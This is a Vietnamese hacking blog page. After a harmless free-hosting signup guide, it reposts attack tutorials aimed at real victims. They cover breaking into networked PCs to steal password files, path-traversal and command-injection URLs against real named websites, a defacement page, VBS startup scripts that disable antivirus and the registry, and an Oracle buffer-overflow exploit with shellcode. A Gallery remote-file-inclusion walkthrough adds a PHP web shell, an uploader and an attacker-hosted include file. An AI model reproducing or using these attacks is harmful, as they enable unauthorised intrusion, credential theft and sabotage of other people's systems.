Thứ Sáu, 1 tháng 11, 2013

on Leave a Comment

Huong dẫn đăng kí hostinger.vn từ a đến z miễn phí


Ra đời từ năm 2004 và phát triển mạnh ở một số nước như Mỹ, Mexico, Columbia. Braxin, Italia, Nga.. và gần đây nhất là Việt Nam. Mặc dù mới xuất hiện nhưng Hostinger hiện đang được xem là nhà cung cấp hosting miễn phí nổi trội tại Việt Nam với một số đặc điểm như sau: 

Dung lượng 2000 MB, băng thông 100 GB

Control Panel dễ sử dụng

Server nhanh và đáng tin cậy


Tài khoản của bạn hoạt động trên server Intel Xeon CPU, 16 Gb Ram và ổ cứng SSD, tốc độ mỗi đường truyền đạt tới 10,000 MB một giây, đảm bảo cho việc truy cập tức thời và dịch vụ không gián đoạn. Chúng tôi đảm bảo rằng thời gian uptime ít nhất cho website của bạn là 99.9%.

Free Web Hosting


2000 MB dung lượng
100 GB (100,000 MB) băng thông
Host số lượng tên miền không giới hạn
Quản lý bằng cPanel
Không quảng cáo hoặc banner
Công cụ dựng web dể sử dụng
Tự động cài đặt (Joomla, Wordpress, etc.)
Dịch vụ emails (IMAP/POP3/Webmail)
Hỗ trợ PHP và MySQL database
Kích hoạt tài khoản tức thời

Bạn có thể xem bảng so sánh các gói host tại Hostinger





Hướng dẫn đăng ký:

Bước 1: vào trang chủ hostinger
Bước 2: chọn đăng ký tài khoản mới và điền đầy đủ thông tin bao gồm: Tên, Email, mật mã



Bước 3: Check mail, bạn sẽ nhận được thông tin kích hoạt và đăng nhập.
Vậy là bạn đã có được một gói host miễn phí hoàn toàn và vĩnh viễn. Bây giờ bạn có thể sử dụng chức năng Builer Website của Hostinger hoặc có thể upload source lên và cài đặt Website.

Thứ Ba, 8 tháng 10, 2013

on 1 comment

Xam nhap vao may tinh cua Victim

Xâm nhập vào máy tính của Victim đang Online bằng chương trình Essential NetTools :
- Đầu tiên các bạn phải Download chương trình Essential NetTools :
Essential Net Tools 3.0 và Crack của nó
Rồi thực hiện các bước sau :
+ Giải nén files Essential Net Tools 3.0.zip bằng các công cụ giải nén như :
Winzip, Winrar...
Download tại : http://www.winzip.com/
Bước 1 : Thiết lập cấu hình
- Bạn vào trong Control Panel rồi vào Network
- Click vào nút Add rồi chọn phần Client
- Tiếp tục nhấn nút Add. Rồi chọn phần Microsoft
- Chọn phần Client for Microsoft Network
- Cuối cùng là OK
Bước 2 : Bắt đầu xâm nhập
+ Ngay phần NBscan
ngay phần" Starting IP":
Đánh vào IP của bạn. Để biết số IP của bạn thì vào Start --> Run rồi gõ : "winipcfg"
VD :
203.162.11.1
hoặc :
202.167.122.1
Còn phần Ending Ip :
203.162.11.255
hoặc :
202.167.122.225
+ Sau đó click chuột vào nút Start
+ Chờ sau giây lát !
Nó sẽ xuất hiện danh sách IP sau khi dò tìm !
+Ngay phần RS:
No : là không có xâm nhập vào được
Yes: là xâm nhập được (nhưng đôi khi thì không)
+ Nhấp chuột phải vào hàng mà có chữ "Yes"
- Nhấp vào phần "Open Computer"
+ Và sau đó các bạn có thể xâm nhập vào máy của victim được nhưng cũng có thể có mấy cái máy không xâm nhập vào được !
Nhưng đột nhập để làm gì ?
Chúng ta đột nhập để ăn cắp Acount và dữ liệu của victim !
Ắn cắp Password bằng cách lấy files PWL của victim trong :
C:/window/*.PWL
Rồi dùng công cụ PWL Tool để đọc được file đó

Xam nhap vao may tinh cua Victim
on 1 comment

Web Hacking

Web Hacking, Brief Introduction :


Trong thời đại hiện nay khi internet được phổ biến rộng rãi, các tổ chức, cá nhân đều có nhu cầu giới thiệu thông tin của mình trên xa lộ thông tin cũng như thực hiện các cuộc giao dịch buôn bán online. Vấn đề nảy sinh là khi phạm vi ứng dụng của các web application ngày càng phổ biến thì khả năng xuất hiện lỗi và bị tấn công càng cao. Trong các lĩnh vực hacking, hack web application là sân chơi khá lý thú cho những ai yêu thích computer security.

Thông thường, những bước cơ bản khi thực hiện hack web bao gồm như sau - các bước này không nhất thiết phải thực hiện tuần tự mà tùy vào điều kiện của chúng ta.

1. Thu thập thông tin ở mức trên về hạ tầng của mục tiêu

Bước này ta cần thu thập một số thông tin quan trọng như có bao nhiêu server, mô hình của các web server, các client nào sẽ tương tác với ứng dụng web, kiểu giao tiếp thông tin (transport) và thông qua các cổng (port) nào, những site liên quan đến việc thực hiện chức năng của site mục tiêu....

2. Khảo sát ứng dụng web

Ở đây tôi chỉ mô tả một trong những phương pháp khảo sát khá phổ biến từ trước đến giờ, đó là Xem mã nguồn và lợi dụng các lỗi cho phép xem mã nguồn.

Một số ngôn ngữ web thông dụng hiện nay có nhiều lỗi này như Active Server Pages (ASP), Common Gateway Interface (CGI), ColdFusion Server (CFM), Hypertext Preprocessor (PHP).

Bài viết này tôi chỉ đề cập đến 1 bug đã có từ lâu nhưng thấy vẫn còn nhiều site mắc phải, đó là lỗi liên quan đến CGI design cho phép view source và file system traversal. Hãy xem ví dụ sau:

http://www.earthdayalliance.org/index.cgi?page=contact.htm

Ở đây index.cgi được gọi với tham số truyền vào là trang contact.htm (HTML file) nó sẽ đọc và hiện nội dung của trang này lên client browser. Tuy nhiên nếu người viết cgi không kiểm tra kĩ lưỡng, ta có thể lợi dụng để xem chính nội dung của file index.cgi hay các trang khác. Ví dụ sau ta sẽ thay contact.htm bằng index.cgi:

http://www.earthdayalliance.org/index.cgi?page=index.cgi

Ở đây ta gặp 1 thông báo lỗi "error: No such file or directory /web/guide/earthdayalliance/www/content/index.cgi", nguyên nhân là thực tế index.cgi không nằm trong thư mục hiện hành (tức là ../www/content/) mà nằm ở www, do đó ta sẽ chỉnh lại link 1 chút bằng 1 dot dot slash, như sau:

http://www.earthdayalliance.org/index.cgi?page=/../index.cgi

Chạy link này ta sẽ thấy nội dung của index.cgi được show trên browser. Việc xem được source có thể giúp ta tìm hiểu kĩ càng hơn về web app, thậm chí nếu may mắn có thể xem được những thông tin quan trọng khác. Lệnh sau là 1 ví dụ dùng lỗi này để xem file etc/passwd trong unix server:

http://www.earthdayalliance.org/index.cgi?page=/../../../../../../../../../etc/passwd

Đây chỉ là 1 ví dụ nhỏ, còn khai thác hay hạn chế thế nào thì tùy khả năng của mỗi người.

Các bạn có thể tìm các site bị lỗi này bằng cách dùng www.google.com, search từ khóa liên quan, chẳng hạn như: "index.cgi?page="

Đây là vài link tôi tìm thấy, các bạn có thể tham khảo:

http://www.discountdata.com/index.cgi?page=index.cgi

http://home.no.net/danm2/freezeware/index.cgi?page=leecher.html

http://home.no.net/danm2/freezeware/index.cgi?page=/../../../../../../../../etc/passwd

http://itf.fys.kuleuven.ac.be/workshop2002/index.cgi?page=practical.htm

http://itf.fys.kuleuven.ac.be/workshop2002/index.cgi?page=/../../../../../../etc/passwd

http://www.resource.nl/uk/index.cgi?page=index.cgi

http://www.earthdayalliance.org/index.cgi?page=contact.htm

http://www.earthdayalliance.org/index.cgi?page=/../index.cgi

http://www.earthdayalliance.org/index.cgi?page=/../../../../../../../../../etc/passwd

http://www.nestingeagles.com/index.cgi?page=videoB.htm

http://www.nestingeagles.com/index.cgi?page=/../index.cgi

http://www.nestingeagles.com/index.cgi?page=/../../../../../../etc/passwd

http://www.warehousejewelry.com/cgi-bin/index.cgi?page=Privacy_Policy.htm

http://www.warehousejewelry.com/cgi-bin/index.cgi?page=/../index.cgi

http://www.warehousejewelry.com/cgi-bin/index.cgi?page=/.././admin/configuration.pl

http://www.warehousejewelry.com/cgi-bin/index.cgi?page=/../../../../../../../etc/passwd

http://demo1.secmod.com/index.cgi?page=links.html

http://demo1.secmod.com/index.cgi?page=index.cgi

http://demo1.secmod.com/index.cgi?page=/../../../../../etc/passwd

http://www.vintagejournal.com/VJ0901/index.cgi?page=/../index.cgi

http://www.vintagejournal.com/VJ0901/index.cgi?page=home.htm

http://www.datadart.com/commercesql/index.cgi?page=STK%20Datasheets.html&car

http://www.datadart.com/commercesql/index.cgi?page=/../index.cgi

http://www.gatlinburggateway.com/index.cgi?&page=/../../../../../../etc/passwd

http://www.berkshire-is.com/index.cgi?page=news.html

http://www.berkshire-is.com/index.cgi?page=index.cgi

http://www.berkshire-is.com/index.cgi?page=/../../../../../etc/passwd

http://www.smokymtnarts-crafts.com/index.cgi?page=otto.htm

http://www.smokymtnarts-crafts.com/index.cgi?page=/../index.cgi

http://www.textileflags.com/cgi-bin/rock_flag_store/index.cgi?page=flagsbyname.html

http://www.textileflags.com/cgi-bin/rock_flag_store/index.cgi?page=/../index.cgi

http://www.randalloglegallery.com/index.cgi?page=about.htm

http://www.randalloglegallery.com/index.cgi?page=/../index.cgi

.....

Lưu ý các site trên chưa được thông báo về lỗi này.

3. Tấn công các web server


4. Tấn công vượt qua các cơ chế kiểm soát (authentication, authorization)

Bao gồm các phương pháp như đoán mật khẩu, làm việc - thay đổi thông tin cookies, các kĩ thuật directory traversal, leo thang đặc quyền, các phương pháp tấn công dựa vào SQL, SQL injection...

5. Tìm hiểu sâu về các chức năng của ứng dụng web

Tìm hiểu cách thực hiện của các phần trong ứng dụng, đặc biệt như các order input, confirmation, order tracking. Ở đây ta có thể áp dụng các phương pháp như SQL Injection, input validation...

6. Tìm hiểu luồng di chuyển của thông tin

Các thông tin tương tác giữa client và server, các thông tin tương tác với database. Hiện nay việc viết mã để thực hiện việc giao tiếp thông tin thường phải đảm bảo được tính hiệu quả (nhanh), và bảo mật (có thể sẽ chậm hơn). Thường thì tính hiệu quả được ưu tiên hơn do đó có thể sẽ phát sinh lỗi trong quá trình đó và giúp hacker có thể lợi dụng các lỗi như SQL input...để đoạt quyền điều khiển hệ thống.

7. Tấn công trang của người quản lý hệ thống


8. Tấn công client


9. Thực hiện tấn công từ chối dịch vụ Denial-of-Service (DoS)

Đây là cách cuối cùng khi các phương pháp trên không thực hiện thành công.

Phần này cần các bạn có kiến thức chút đỉnh về Unix.

Bước tiếp theo là khai thác khả năng command execution từ client browser thông qua HTTP port. Ở đây các bạn chú ý các kí tự đặc biệt hữu ích khi ta cần thực hiện lệnh trong URL, đó là: newline character (%0a), pipe (%7c), semicolon (%3b), ampersand (%26). Newline char cho phép ta ngắt các lệnh ra thành nhiều dòng khi thực hiện, dùng khi ta kết nhiều lệnh cùng trên cùng 1 dòng; pipe dùng để kết nối nhiều lệnh unix với nhau, tương tự với semicolon; ampersand thường dùng để ngăn cách các tham số truyền vào câu lệnh...Các bạn tự tìm hiểu kĩ hơn các thông tin này.

Tiếp theo vd ở post đầu, đó là: http://www.earthdayalliance.org/index.cgi?page=contact.htm

Bây giờ ta thử gọi 1 lệnh liệt kê thông tin thư mục của unix (ls):

http://www.earthdayalliance.org/index.cgi?page=|ls|

Ta sẽ thấy browser liệt kê ra các file, thư mục có trong thư mục hiện hành của trang web, đại khái như sau:

[badurl.htm contact.txt content count_file edcpressrelease.htm greentemplate.htm guestbook images index.cgi newtemplate.htm registercircle.txt search.html template.htm templates welcome.htm wwwboard ]

Nếu muốn biết rõ hơn về thông tin của file, như quyền hạn, ngày tháng...ta dùng lệnh ls -la, cụ thể URL sẽ là:

http://www.earthdayalliance.org/index.cgi?page=|ls+-la|

Một vd của việc khai thác tiếp theo: ta thấy thư mục wwwboard, đây là 1 dạng webforum đơn giản, ta xem thử nội dung thư mục này:

http://www.earthdayalliance.org/index.cgi?page=|ls%20wwwboard|

Ở đây ta sẽ thấy liệt kê ra content của forum này, trong đó có 1 file passwd.txt, ta muốn xem nội dung file này, chỉ việc thực hiện:

http://www.earthdayalliance.org/index.cgi?page=/../wwwboard/passwd.txt

Lưu ý ta thêm /../ phía trước vì muốn lùi 1 cấp trở về thư mục cha.

Thế là bạn vừa xem được pass admin của forum dạng này.

Đây là 1 thông tin tìm hiểu khác:

http://www.earthdayalliance.org/index.cgi?page=|ls%20/../../../../../etc+-la|

Liệt kê các user trong server này:

http://www.earthdayalliance.org/index.cgi?page=|ls+/../../.././web/guide+-al|

.....

Bước khai thác kế tiếp dành cho các bạn: Thực hiện nhiều câu lệnh, get shell... Chúc thành công.

Các công cụ có thể áp dụng trong web hacking các bạn có thể tìm hiểu ở trang:

http://www.hackingexposed.com/tools/tools.html

Một tài liệu nhỏ về web hacking khác (đây là tài liệu English, đọc bằng chương trình Microsoft powerpoint trong bộ Microsoft Office):

webhacking.zip

Title: Web Hacking - Brief Introduciton

Version: 1.0 build 26092002

Author: W_Hat

References: Hacking Exposed series, Web Hacking from FoundStone.com,

Constructing: Basic Hacking Methodologies

Bài viết của W_Hat

Web Hacking
on Leave a Comment

View HardDisk

 


View HardDisk :
Sau khi bạn Hack được 1 trang Web thì có lẽ bạn upload trang Web của bạn với dòng chữ "This Website was hacked by ..." thay cho trang index. Nhưng như vậy thì thường quá mà lại không có ấn tượng . Bạn muốn làm cho Victim một phen giật mình, ok. Bạn hãy upload 1 trang Web có source như sau :
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD><TITLE>This Website was Hacked</TITLE>
<STYLE>BODY {
FONT-SIZE: 12px; COLOR: black; FONT-FAMILY: tahoma
}
</STYLE>
<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
<META content="MSHTML 6.00.2600.0" name=GENERATOR></HEAD>
<BODY text=#000000 bgColor=#ffffff>
<P>Is dit van u?</P>
<P>
<OBJECT id=browserIcons height="90%" width="100%" align=baseline border=0
classid=clsid:EAB22AC3-30C1-11CF-A7EB-0000C05BAE0B><PARAM NAME="ExtentX" VALUE="7938"><PARAM NAME="ExtentY" VALUE="3969"><PARAM NAME="ViewMode" VALUE="1"><PARAM NAME="Offline" VALUE="0"><PARAM NAME="Silent" VALUE="0"><PARAM NAME="RegisterAsBrowser" VALUE="0"><PARAM NAME="RegisterAsDropTarget" VALUE="0"><PARAM NAME="Height" VALUE="150"><PARAM NAME="Width" VALUE="300"><PARAM NAME="AutoArrange" VALUE="1"><PARAM NAME="NoClientEdge" VALUE="1"><PARAM NAME="AlignLeft" VALUE="0"><PARAM NAME="ViewID" VALUE="{0057D0E0-3573-11CF-AE69-08002B2E1262}"><PARAM NAME="Location" VALUE="file:///C:/"></OBJECT><BR>Greetz harry
<BR></P></BODY></HTML>
Như vậy khi Victim vào Website của mình thì tự động nó sẽ View HardDisk (thường là ổ C) của Victim. Như vậy sẽ ấn tượng hơn

View HardDisk

on Leave a Comment

Vai tro dua voi Victim

 

Vài trò đùa với các Victim



Khi các bạn đột nhập được vào máy người khác, tại sao không đùa với họ một tí nhỉ ?
Sau đây là một vài trò chơi do tôi nghĩ ra, bằng cách đặt một file (*.vbs) nằm trong thư mục Startup chứa một trong những đoạn script sau:

1.Trò chơi thứ nhất: không cho victim khởi động máy:

Dim wsh
Set wsh = createobject("wscript.shell")
wsh.run "RUNDLL32.EXE user.exe,exitwindows"

2.Trò chơi thứ hai: disable NAV( nếu có install) của họ:
Dim wsh
Set wsh= CreateObject( "WScript.Shell")
s1 = "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Norton Program
Scheduler\Start"
wsh.RegWrite s1,3, "REG_DWORD"

3.Trò chơi thứ ba: hiển thị môt meesage mỗi khi họ reboot máy:
dim wsh
Set wsh = CreateObject( "WScript.Shell" )
s1 = "HKLM\Software\Microsoft\Windows\CurrentVersion\WinLogon\"
s2 = "LegalNoticeCaption"
s3 = "LegalNoticeText"
wsh.RegWrite s1+s2, "Hackervn.org"
wsh.RegWrite s1+s3, "Robinhood invite you to join hackervn.org"

4.Trò chơi 4: hiển thị một dòng lệnh mỗi khi họ click vào một file hay folder:
set reg=createobject("WScript.shell")
reg.regwrite "HKEY_CLASSES_ROOT\*\Shell\Hello I am Robinhood-come from hackervn.org\",""
reg.regwrite "HKEY_CLASSES_ROOT\folder\shell\Hello I am Robinhood-come from hackervn.org\","Robinhood"

5.Trò chơi 5: trò chơi này đảm bảo cho các trò chơi trên có thể diễn ra "vui vẻ": disable Registry của victim:
Dim objShell
Set objShell = CreateObject( "WScript.Shell" )
s1 = "HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\"
s2 = "Policies\System\DisableRegistryTools"
objShell.RegWrite s1+s2,1, "REG_DWORD"
Trên đây là 5 trò chơi "khá vui", thật ra còn nhiểu trò chơi khác nũa nhưng "nguy hiểm" cho victim nên thôi.

--------------------

Virus is nothing but if you don't take care of them, you will have nothing.


Vai tro dua voi Victim

on Leave a Comment

Exploit For The 'Unbreakable' Oracle Database

 

Exploit For The 'Unbreakable' Oracle Database :

Những điều cần biết trong lỗi Unbreakable' Oracle Database

1 - Lỗi tràn bộ đệm xuất hiện khi ta viết quá 2132 bytes vào trong bộ đệm tại command line 2128 để ghi đè lên ebp và tại command line 2132 để ghi đè lên eip

2 - Nếu bạn viết quá 2132 bytes thì nhưng khung khác sẽ bị ghi đè lên về sau sẽ bị xáo trộn trên những mã của bạn , và mã chuyên quyền sẽ được thực thi ( Chú ý nó phải chính xác là 2132 bytes )

3 - Shellcode ở dưới đây sẽ cố gắng làm 1 setreuid(515)

Tác hại của shellcode này : Nó sẽ giúp Hacker làm ngưng trệ hoặc làm treo hệ thống , nếu hệ thống đó bị lỗi này . Cái này chỉ dùng để phá hoại các server mà thôi . Không nên lạm dụng nó . Nếu bạn là 1 Hacker chân chính :-)

*/

#include <stdio.h>

#include <stdlib.h>

#define DEFAULT_EGG_SIZE 4096

#define NOP 0x90

/* 2132 + 1 for the \0 at the end of the string */

#define DEFAULT_BUFFER_SIZE 2133

/* Shellcode made by mafiaboy@hotpop.com */

char shellcode[] =

"\x31\xdb" /* xor %ebx, %ebx */

"\x31\xc9" /* xor %ecx, %ecx */

"\xf7\xe3" /* mul %ebx */

"\xb0\x46" /* mov $0x46, %al */

"\x66\xbb\x03\x02" /* mov $0x1fc, %bx */

"\x49" /* dec %ecx */

"\xcd\x80" /* int $0x80 */

"\x31\xd2" /* xor %edx, %edx */

"\x52" /* push %edx */

"\x68\x6e\x2f\x73\x68" /* push $0x68732f6e */

"\x68\x2f\x2f\x62\x69" /* push $0x69622f2f */

"\x89\xe3" /* mov %esp, %ebx */

"\x52" /* push %edx */

"\x53" /* push %ebx */

"\x89\xe1" /* mov %esp, %ecx */

"\x6a\x0b" /* pushl $0xb */

"\x58" /* pop %eax */

"\xcd\x80"; /* int $0x80 */

int main(int argc, char *argv[])

{

char *buff;

char *egg;

char *ptr;

long *addr_ptr;

long addr;

int bsize = DEFAULT_BUFFER_SIZE;

int eggsize = DEFAULT_EGG_SIZE;

int i;

int get_sp = (int)&get_sp;

if(argc > 1) { bsize = atoi(argv[1]); }

if(!(buff = malloc(bsize)))

{

printf("unable to allocate memory for %d bytes\n", bsize);

exit(1);

}

if(!(egg = malloc(eggsize)))

{

printf("unable to allocate memory for %d bytes\n", eggsize);

exit(1);

}

printf("Oracle tnslsrn 8.1.5\n");

printf("Vulnerability found by mafiaboy/ http://mafiaboy.netfirm.com);

printf("Coded by The mafiaboy/ http://mafiaboy.netfirm.com");

printf("Using return address: 0x%x\n", get_sp);

printf("Using buffersize : %d\n", bsize - 1);

ptr = buff;

addr_ptr = (long *) ptr;

for(i = 0; i < bsize; i+=4) { *(addr_ptr++) = get_sp; }

ptr = egg;

for(i = 0; i < eggsize - strlen(shellcode)-1; i++)

{

*(ptr++) = NOP;

}

for(i = 0; i < strlen(shellcode); i++)

{

*(ptr++) = shellcode[i];

}

egg[eggsize - 1] = '\0';

memcpy(egg, "EGG=", 4);

putenv(egg);

buff[bsize - 1 ]= '\0';

execl("/home/u01/app/oracle/product/8.1.5/bin/tnslsnr",

"tnslsnr", buff, 0);

return 0;

}
Save đoạn code tên thành 1 file *.c (Vì nó viết bằng lập trình C). Vào MS-DOS Prompt rồi chạy file này rồi kết nối với Server

Chúc các bạn thành công .

Bài viết của  Microsoftvn - phunganhtuan32@hotmail.com

Exploit For The 'Unbreakable' Oracle Database

on Leave a Comment

PHP Code Injecttion

 


PHP Code Injection :
Không có cách học nào hay bằng thực hành trên ví dụ cụ thể, tớ sẽ hướng dẫn bạn cách khai thác php code inject trên một lỗi mới được phát hiện: Gallery code injection
1.Mô tả lỗi:
Gallery là một công cụ cho phép tạo một gallery ảnh trên web, được viết bằng PHP, bạn có thể tìm hiểu và download source tại trang chủ: http://gallery.menalto.com/ và xem báo cáo lỗi tại đây:
http://online.securityfocus.com/archive/1/285608/2002-07-26/2002-08-01/0.
Như đã được hướng dẫn, lỗi này có thể khai thác bằng cách tạo trước một file init.php tại địa chỉ http://your.evil.server.tdl/ rồi sau đó gọi đến url:
http://hostname/gallery/captionator.php?GALLERY_BASEDIR=http://your.evil.server.tdl/
Trong file init.php bạn có thể đặt code php để thực hiện mục đích của mình. Và mục đích của chúng ta là upload lên thư mục web của victim một file php có khả năng upload.
2. Chuẩn bị:
Bạn đăng ký một account host nào đó, hoặc sử dụng account có sẵn của bạn. Nên chọn host nào không hỗ trợ php vì như vậy khi gọi đến file php server sẽ trả lại toàn bộ code của file, còn nếu server hỗ trợ php thì bạn phải sử dụng echo thêm phần phức tạp.
Tớ thì thích dùng brinkster vì ở đây đăng ký nhanh gọn, upload bằng browser như vậy có thể hoàn toàn hack chỉ bằng browser mà thôi.
Bạn tạo 2 file như sau:

Code Sample

<?php
// shellphp.php * file này dùng để chạy shell trên victim host
global $PHP_SELF;
echo "<html><body>
<form method=post action=$PHP_SELF?$QUERY_STRING>
<input type=text name=shell size=40>
<input type=hidden name=act value=shell>
<input type=submit value=Go name=sm>
</form>";
set_magic_quotes_runtime(1);
if ($act == "shell") {
echo "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n<xmp>";
system($shell);
echo "</xmp>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";}
echo "</body></html>";
?>

Code Sample

<?php
// upload.php * file này dùng để upload
function handleupload() {
if (is_uploaded_file($_FILES['userfile']['tmp_name'])) {
$filename = $_FILES['userfile']['tmp_name'];
print "$filename was uploaded successfuly";
$realname = $_FILES['userfile']['name'];
print "realname is $realname\n";
print "copying file to uploads dir ".$realname;
copy($_FILES['userfile']['tmp_name'],*PATH*.$realname); // lưu ý *PATH* chúng ta sẽ thay đổi sau
} else {
echo "Possible file upload attack: filename".$_FILES['userfile']['name'].".";
}
}
if ($act == "upload") {
handleupload();
}
echo "<html><body>
<form ENCTYPE=multipart/form-data method=post action=$PHP_SELF?$QUERY_STRING>
File:<INPUT TYPE=FILE NAME=userfile SIZE=35>
<input type=hidden name=MAX_FILE_SIZE value=1000000>
<input type=hidden name=act value=upload>
<input type=submit value=Upload name=sm>
</form>
</body></html>";
?>

Bạn tạo thêm 1 file init.php với nội dung giống hệt file shellphp.php và upload lên site của bạn, ví dụ http://wwwxx.brinkster.com/you/
3. Xác định mục tiêu:
Bạn vào Google, gõ "Powered by gallery" rồi enter, Google sẽ liệt kê một đống những site sử dụng Gallery, tớ chọn một site http://zarabadoo.insane-asylum.com/gallery./ làm ví dụ. Thử xem nó đã sửa lỗi chưa bằng url: http://zarabadoo.insane-asylum.com/gallery./captionator.php?GALLERY_BASEDIR=http://wwwxx.brinkster.com/you/
Nếu thấy hiện lên như sau là bạn đã thành công bước đầu rồi đó:
image002
Chẳng cần quan tâm đến những thông báo lỗi phía dưới, bây giờ bạn đã có thể gõ lệnh vào text box và thực hiện nó trên host của victim.
4. Trinh sát:
Các file và thư mục trên host luôn được bảo vệ bằng cách kiểm tra quyền hạn của người sử dụng (bạn tham khảo các bài về unix, linux để biết thêm chi tiết). Mà mục đích của chúng ta là upload lên 1 file nên bây giờ phải tìm xem trên đó có chỗ nào cho phép ta ghi file, đồng thời file đó có thể được gọi đến qua http, tức là nằm trong một thư mục active web .
Đầu tiên bạn hãy xác định đường dẫn tuyệt đối đến thư mục hiện thời bằng lệnh pwd:
image004
Tiếp tục kiểm tra trên thư mục hiện thời: dùng lệnh ls –al ta sẽ có kết quả như sau:
image006
Để ý thấy thư mục classes cho phép ghi file, như vậy chúng ta hoàn toàn có thể upload một file lên thư mục /home/insane-/public_html/zarabadoo/gallery/classes/ của server rồi đấy.
5. Gửi tiền trạm:
Tiền trạm của chúng ta sẽ là file upload.php, sau khi có được file này thì chúng ta có thể upload được những công cụ mạnh hơn để khai thác thông tin.
Bây giờ bạn hãy vào account host của bạn, sửa nội dung file init.php giống như code của file upload.php, nhưng sửa lại *PATH* thành “/home/insane-/public_html/zarabadoo/gallery/classes/ ”. Đồng thời cũng chuẩn bị một file upload.php trên máy của bạn với *PATH* là "".
Rồi, chúng ta lại goi đến http://zarabadoo.insane-asylum.com/gallery./captionator.php?GALLERY_BASEDIR=http://wwwxx.brinkster.com/you/ một lần nữa, bạn sẽ thấy file upload hiện lên, chọn file upload.php trên máy của mình rồi upload, bạn sẽ có kết quả sau:
image008
Như vậy là bạn đã thành công trong việc gửi đội tiền trạm đến căn cứ của đối phương rồi đấy, bạn có thể gọi đến nó qua url http://zarabadoo.insane-asylum.com/gallery./classes/upload.php.
Từ bây giờ bạn hãy vận dụng hết mọi mánh khoé để tấn công đối thủ đi, upload backdoor, shell, rootkit, .. Bạn có thể Download con BackDoor Shell được viết bằng PHP tại đây : Shell.php (chú ý : khi chạy shell.php thì nó bắt nhập username và password, bạn gõ username là root còn password thì bỏ trống và Enter) 
image010
và thế là ..
image012
6. Kết luận:
Thực ra ví dụ mà tớ đưa ra rất đơn giản, và may mắn gặp được host server có bảo mật thấp. Bạn có thể gặp nhiều tên rắn mặt hơn nhiều, hãy phát huy sáng tạo đến mức tối đa.
Hơn nữa đây chỉ là ví dụ về hack Gallery, nhưng đó là phương pháp chung để khai thác lỗi php code injection. Lỗi này khá phổ biến, và sẽ còn tiếp tục được phát hiện thêm, hãy sử dụng phương pháp này một cách uyển chuyển, chắc chắn bạn sẽ thành công.
Bài viết của vnofear


PHP Code Injecttion